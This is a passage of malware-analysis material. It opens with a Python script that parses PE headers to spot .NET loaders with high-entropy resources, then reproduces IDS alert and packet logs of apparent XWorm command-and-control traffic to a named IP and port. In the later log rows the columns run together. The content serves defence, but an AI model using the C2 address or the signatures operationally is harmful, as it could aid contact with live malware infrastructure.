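        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    if magic == 0x10B:    # PE32: 32-bit ImageBase at +28, NumberOfRvaAndSizes at +92, directories at +96
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:  # PE32+: no BaseOfData, 64-bit ImageBase at +24, 8-byte stack/heap fields
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", buf, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", buf, dirs_off + 8 * i) for i in range(ndirs)]
    sections = []
    sec_off = opt + opt_size
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size, "data": buf[raw_ptr:raw_ptr + raw_size]})
    return {"image_base": image_base, "entry_rva": entry, "dirs": dirs, "sections": sections}


def rva_to_offset(sections, rva: int) -> int:
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def analyse(buf: bytes) -> dict:
    pe = parse_pe(buf)
    dirs = pe["dirs"]
    iat_rva = dirs[12][0] if len(dirs) > 12 else 0
    is_dotnet = len(dirs) > 14 and dirs[14] != (0, 0)   # COM descriptor (CLR header) present
    # A .NET image's native entry point is `FF 25 <absolute address>`: jmp dword ptr [addr],
    # where addr is the IAT slot the loader resolves to mscoree!_CorExeMain.
    stub_off = rva_to_offset(pe["sections"], pe["entry_rva"])
    stub = buf[stub_off:stub_off + 6]
    entry_is_clr_stub = (len(stub) == 6 and stub[:2] == b"\xff\x25"
                         and struct.unpack("<I", stub[2:])[0] - pe["image_base"] == iat_rva)
    entropy = {s["name"]: shannon_entropy(s["data"]) for s in pe["sections"]}
    return {"is_dotnet": is_dotnet, "entry_is_clr_stub": entry_is_clr_stub, "section_entropy": entropy,
            "high_entropy_sections": [n for n, e in entropy.items() if e >= ENTROPY_THRESHOLD]}


def build_sample_pe() -> bytes:
    """Constructed PE32 that mirrors the report's layout; this is NOT the analysed sample."""
    image_base, file_align = 0x400000, 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x0102)     # i386, 3 sections, EXECUTABLE|32BIT
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 8, 0, 0x200, 0x1200, 0,
                      0x2050,                                           # AddressOfEntryPoint -> CLR stub
                      0x2000, 0x3000, image_base, 0x1000, file_align,
                      4, 0, 0, 0, 4, 0, 0, 0x5000, 0x200, 0,
                      2, 0x8540,                                        # WINDOWS_GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TS_AWARE
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[12] = (0x2000, 0x8)    # IAT: the single slot for mscoree!_CorExeMain
    dirs[14] = (0x2008, 0x48)   # COM descriptor: marks the image as .NET
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    hdr = "<8sIIIIIIHHI"
    headers = (dos + b"PE\0\0" + coff + opt
               + struct.pack(hdr, b".text", 0x60, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
               + struct.pack(hdr, b".rsrc", 0x1000, 0x3000, 0x1000, 0x400, 0, 0, 0, 0, 0x40000040)
               + struct.pack(hdr, b".reloc", 0xC, 0x4000, 0x200, 0x1400, 0, 0, 0, 0, 0x42000040)
               ).ljust(file_align, b"\0")
    stub = b"\xff\x25" + struct.pack("<I", image_base + 0x2000)        # jmp dword ptr [00402000h]
    text = ((b"\0" * 8 + struct.pack("<I", 0x48)).ljust(0x50, b"\0") + stub).ljust(0x200, b"\0")
    rsrc = b"".join(hashlib.sha256(b"rsrc-%d" % i).digest() for i in range(128))  # stands in for an encrypted resource
    reloc = struct.pack("<III", 0x2000, 0xC, 0).ljust(0x200, b"\0")
    return headers + text + rsrc + reloc


if __name__ == "__main__":
    for key, value in analyse(build_sample_pe()).items():
        print(key, value)
```

Run against a real dropped file, replace `build_sample_pe()` with `open(path, "rb").read()`; the three checks together are what separates a legitimate .NET GUI application with a large icon (high entropy in a PNG resource, as RT_ICON here) from a loader whose .rsrc is the encrypted second stage, so treat a flagged section as a prompt to dump and inspect the resource directory rather than as a verdict on its own.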
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T15:20:23.932978+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:24.666364+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:24.694814+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:28.810945+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:28.810945+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:35.564791+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:35.567275+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:46.628008+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:46.631035+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:57.689916+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:57.691756+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:58.593385+0100 | 2853192 | ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound | 1 | 192.168.2.6 | 49884 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:58.893906+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:58.893906+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:59.340612+0100 | 2853191 | ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound | 1 | 103.230.121.124 | 7000 | 192.168.2.6 | 49884 | TCP
2024-11-29T15:20:59.822140+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.822140+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.943490+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:59.943490+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.064973+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.064973+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.184921+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.184921+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.306110+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.306110+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.426980+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
                                                                                2024-11-29T15:21:00.426980+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.547220+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.547220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.787599+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.787599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.907672+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.907672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.027780+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.027780+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.147964+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.147964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.268067+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.268067+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.390386+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.390386+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.512111+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.512111+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.724011+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.724011+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.923266+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.923266+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.125543+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.125543+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.246667+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.246667+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.366715+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.366715+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.608571+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.608571+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.728572+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.728572+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.848703+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.848703+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.088530+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.088530+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.208751+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.208751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.329282+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.329282+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.449996+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.449996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.573360+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.573360+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.814592+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.814592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.920478+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.920478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.040774+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.040774+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.162284+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.162284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.290201+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.290201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.426020+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.426020+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.596157+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.596157+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.720026+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.720026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.030145+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.030145+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.150189+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.150189+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.270211+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.270211+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.372291+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.372291+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.492173+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.492173+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.854165+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.854165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.975522+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.975522+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.029420+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.029420+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.149596+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.149596+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.269661+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.269661+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.389848+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.389848+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.510254+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.510254+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.630516+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.630516+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.712689+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.712689+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.832827+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.832827+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.952909+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:06.952909+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.073227+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.073227+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.193395+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.193395+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.313717+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.313717+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.420599+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.420599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.540909+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:07.540909+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:10.865014+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:21:10.866269+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649884103.230.121.1247000TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Nov 29, 2024 15:20:59.578258991 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:20:59.585669041 CET498847000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:20:59.698344946 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:20:59.698460102 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:20:59.701263905 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:20:59.822087049 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:20:59.822139978 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:20:59.943412066 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:20:59.943490028 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.064891100 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.064973116 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.184848070 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.184921026 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.304888010 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.306109905 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.426881075 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.426980019 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.547149897 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.547219992 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.667432070 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.667515039 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.787523031 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.787599087 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:00.907604933 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:00.907671928 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.027715921 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.027780056 CET499867000192.168.2.6103.230.121.124
